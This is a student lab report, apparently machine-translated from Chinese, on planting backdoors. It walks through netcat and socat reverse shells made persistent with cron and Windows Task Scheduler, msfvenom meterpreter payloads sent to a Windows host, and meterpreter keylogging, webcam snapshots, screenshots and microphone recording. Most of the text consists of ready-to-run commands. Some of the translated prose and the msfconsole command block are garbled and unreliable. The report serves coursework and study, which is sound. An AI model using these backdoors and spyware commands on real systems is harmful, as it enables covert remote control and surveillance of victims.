table of Contents
First, content description and experimental basic questions answered
Second, the tools to prepare
- View WindowsIP and LinuxIP
- Windows get Linuxshell
- Linux get Windows shell
- Transmitting data using nc
Third, the experimental process
- Use netcat get the host operating Shell, cron start
- Use socat get the host operating Shell, plans to start the task
- Use MSF meterpreter (or other software) to generate an executable file, or use ncat socat to the host and run to get the host Shell
- Use MSF meterpreter (or other software) to generate the target host to obtain audio content, camera, keyloggers, etc., and try to put right
- Alternatively points: Using the MSF generate the shellcode, poured into 1 pwn1 in practice, the acquisition rebound connection Shell
Fourth, the problem with thinking
First, content description and experimental basic questions answered
1, the content of the experiment
(1) using the acquired host operating netcat Shell, cron start (0.5 min)
(2) use socat get the host operating Shell, plans to launch the task (0.5 points)
(3) using the MSF meterpreter (or other software) to generate an executable file, or using ncat socat transferred to the host and runs a host acquires Shell (0.5 min)
(4) using the MSF meterpreter (or other software) to generate the target host acquires audio content, the camera, and the like recording keystrokes, and try to provide the right (2 minutes)
(5) plus optional content: MSF generated using the shellcode, poured into 1 pwn1 in practice, the acquisition rebound connection Shell (1 min) plus the contents of this experiment together written report.
2, answer basic questions
1) include a back door you can think of possible ways to enter your system?
- Linux computer account password hack
- Replace login program that provides special password Invisible Sign
- Hidden back door in the file system
(2) How do you know exemplified by the back door to start up (win and linux) way?
- Linux: crontab function by the Trojans to start the timer, the control panel will be able to maintain the status monitor periodically start the back door, it can also bind to normal healthy then injected shellcode open the back door.
- win: passive acceptance of backdoors or download, when the injured party click to run the backdoor program starts.
Which gives you a profound image function (3) Meterpreter there?
- Basic functions (basic connectivity, executing instructions)
- Extensions (such as collecting user information, installation services and other functions)
(4) How to find yourself the system has not been installed back door?
- Install antivirus software: for real-time protection.
- Detect network connection: Check for IP to establish a connection with the machine.
Second, the tools to prepare
-
View WindowsIP and LinuxIP
-
Under Windows command
ipconfig
-
Linux using
ifconfig
-
Windows to get Linux shell
-
Use ncat program, input
ncat.exe -l -p 5224
monitor the machine port 5224 -
Using nc command in the kali
-e
option, inputnc 192.168.1.2 5224 -e /bin/sh
reverse connection port Windows 5224 hosts -
On the Windows side, access kali's shell
Linux get Windows shell
-
Use
nc
command monitor5224
port -
In Windows, use the
ncat.exe
program's-e
option to reverse connection kali host5224
port -
At this point you can see kali Windows command prompt, you can enter the relevant Windows command (enter here
dir
)
Transmitting data using nc
-
Windows monitor
5224
port -
Under Kali is connected to a Windows
5224
port -
Establishing a data transmission connection
Third, the experimental process
Use netcat get the host operating Shell, cron start
-
In Windows monitor
5224
port -
In kali, washed with
crontab -e
edit a scheduled task, select the editor3
-
Add a line at the end
24 * * * * /bin/netcat 192.168.1.2 5224 -e /bin/sh
, which means the reverse connection of Windows hosts in the 24th minute of every hour5224
port -
14:24 time to time, have been obtained in the shell kali, commands can be entered
Use socat get the host operating Shell, plans to start the task
socat
It isncat
an enhanced version of the format it usessocat [options] <address> <address>
, two of which address is mandatory, and the options are optional.
socat basic function is to create two bidirectional byte stream data is transmitted therebetween, the parameter is the address of which represents a new direction. The so-called flow represents the flow of data, and the data can have many different types, the command requires a number of options for correspondingly various types defined and described data flow.
-
In win10 system, right-click the bottom left corner of the screen windows icon, select "Computer Management" (or simply search for "Computer Management")
-
Create a task in Task Scheduler, to fill in the task name, and create a new trigger
-
In operation - Choose your> program or script
socat.exe
file path, add a column to fill in the parameterstcp-listen:5224 exec:cmd.exe,pty,stderr
, this command does is tocmd.exe
bind to the port5224
, while thecmd.exe
thestderr
redirect tostdout
the -
Once created, the discovery task is ready, press the Windows + L shortcut key to lock your computer when you open again, find the task you created, double-click, you can create a discovery task before the run has begun
-
At this point, enter the command in Kali environment
socat - tcp:192.168.1.2:5224
, the first argument here-
represent the standard input and output, the second stream to port Windows 5224 host, can be found at this time has successfully obtained a cmd shell
MSF meterpreter using an executable file using ncat socat or transferred to the host and the host operating acquired Shell
-
Input command
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.182.128 LPORT=5224 -f exe > 20175224_backdoor.exe
generating backdoorNote The IP address is LinuxIP
- The next Windows entry into the receiving mode
ncat.exe -lv 5224
>
20175224_backdoor.exe,
-
Linux executed
nc 192.168.1.2 5224 < 20175224_backdoor.exe,
Note Closing the virus killing softwareThe IP address of the host that is WindowsIP
-
Successfully transmitting and receiving files
-
Kali open terminal, enter
msfconsole
commands into the console msf -
Enter
use exploit/multi/handler
into the monitor module -
Input
set payload windows/meterpreter/reverse_tcp
settings payload -
Sequentially inputted
set LHOST 192.168.182.128
andset LPORT 5224
set the IP and portNote that at this time when the specified IP address LinuxIP, and generates the same IP backdoor
-
Setup is complete, start listening
exploit
-
Backdoor running under Windows
-
kali has received Windows host connection, remote control and get the shell
MSF meterpreter acquire the content using the destination host generates audio, camera, records keystrokes
-
Use
record_mic
instructions can intercept an audio (headset desktop because the family had no use for it can not be achieved) -
Use
webcam_snap
instructions can use the camera to take pictures (desktop at home because the camera is not configured and therefore can not be achieved) -
Use
screenshot
instructions can be screenshots -
Using
keyscan_start
an instruction to start recording the keystrokes using thekeyscan_dump
instruction to read the recorded keystrokes
Alternatively points: Using the MSF generate the shellcode, poured into 1 pwn1 in practice, the acquisition rebound connection Shell
-
Use the command
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.182.128 LPORT=5224 -x /root/Desktop/20175224/exp2/pwn1 -f elf > 5224pwn
generates shellcode template file pwn1 this elf file format 5224pwn (reference is made here https://www.cnblogs.com/clever-universe/p/8691365.html) - Input command
msfconsole
into the command line msf
use exploit / multi / handler / * handler into the mode * / SET payload Linux / the x86 / Meterpreter / reverse_tcp / * set corresponding to the generated backdoor * payload / Show Options / * check the current status information * / SET lhost 192.168.182.128 / * set lHOST, where ip is the attacker's Linux * ip / the sET LPORT 5224 / * * set LPORT / exploit / * start the listener * /
- Run the backdoor file 5224pwn on kali,
在kali中执行pwn2时应先加权限 chmod +x 5224pwn
- At this point the attacker Linux has gained connected attacker Linux, and get a shell on the remote control
Fourth, the problem with thinking
Problems encountered in the experiment
-
Question 1: kali use nc rebound after connecting host does not have any display
-
Problem 1 Solution: In the blank, enter a command, such as
ls
etc., and then press Enter
Experimental Experience
The back door to do is experiment, experiment of this principle than the first experiment to be easier to understand, but because you want to use to operate the software so than the first time will be a little trouble. Through this experiment, my mastery of knowledge significantly improved, can learn a lot of things, this is very delightful.
The experiments also feel very interesting, looking forward to the next learning!